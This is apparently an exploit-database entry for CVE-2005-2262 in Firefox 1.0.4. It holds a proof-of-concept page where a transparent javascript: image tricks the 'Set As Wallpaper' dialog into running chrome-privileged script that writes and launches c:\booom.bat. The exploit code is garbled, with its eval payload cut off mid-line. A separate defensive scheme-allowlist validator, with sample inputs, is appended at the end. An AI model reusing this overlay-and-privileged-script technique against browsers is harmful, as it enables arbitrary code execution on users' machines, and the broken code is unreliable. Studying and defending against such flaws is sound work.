Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution

Related Vulnerabilities: CVE-2005-2262  
Publish Date: 13 Jul 2005
Author: Michael Krax
// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<title>Firewalling - Proof-of-Concept</title>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image URL as a parameter without validating it.
This allows an attacker to execute JavaScript in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter, an attacker can easily fool the
user into thinking he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directory listing in a DOS box (Windows only).

<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">


# [2005-07-13]
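
The validation the text above says is missing, sketched from the defender's side as an added example; it is not code from the original page or from Mozilla, and it is not the actual Firefox fix. The names `checkImageUrl` and `ALLOWED_SCHEMES`, the http/https-only policy and the sample inputs are assumptions made for illustration.

```javascript
// Added example: scheme allowlist for an image URL before it is handed to a
// privileged consumer. checkImageUrl and ALLOWED_SCHEMES are hypothetical names.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]); // assumption: network images only

function checkImageUrl(rawSrc, pageUrl) {
  if (typeof rawSrc !== "string" || rawSrc.trim() === "") {
    return { ok: false, reason: "empty src" };
  }
  let parsed;
  try {
    // Resolve the way a browser does: relative to the page, after the URL
    // parser strips leading whitespace and embedded tabs/newlines. Checking
    // the raw string with startsWith() would miss those spellings.
    parsed = new URL(rawSrc, pageUrl);
  } catch (e) {
    return { ok: false, reason: "unparseable URL" };
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { ok: false, reason: "scheme not allowed: " + parsed.protocol };
  }
  // Pass on the normalized URL, never the raw attribute string.
  return { ok: true, href: parsed.href };
}

// Constructed sample inputs (not taken from the page).
const PAGE = "https://example.test/gallery/index.html";
const SAMPLES = [
  "photos/beach.jpg",
  "https://example.test/a.png",
  "javascript:void(0)",
  "  JaVaScRiPt:void(0)",
  "java\tscript:void(0)",
  "data:text/html,<b>x</b>",
  "chrome://browser/content/x.png",
  "",
];

function runSamples() {
  return SAMPLES.map((src) => ({ src, result: checkImageUrl(src, PAGE) }));
}

for (const { src, result } of runSamples()) {
  const verdict = result.ok ? result.href : "REJECTED (" + result.reason + ")";
  console.log(JSON.stringify(src), "->", verdict);
}
```

Only the two http(s) samples pass; every `javascript:` spelling, `data:`, `chrome:` and the empty `src` are rejected before anything privileged sees them.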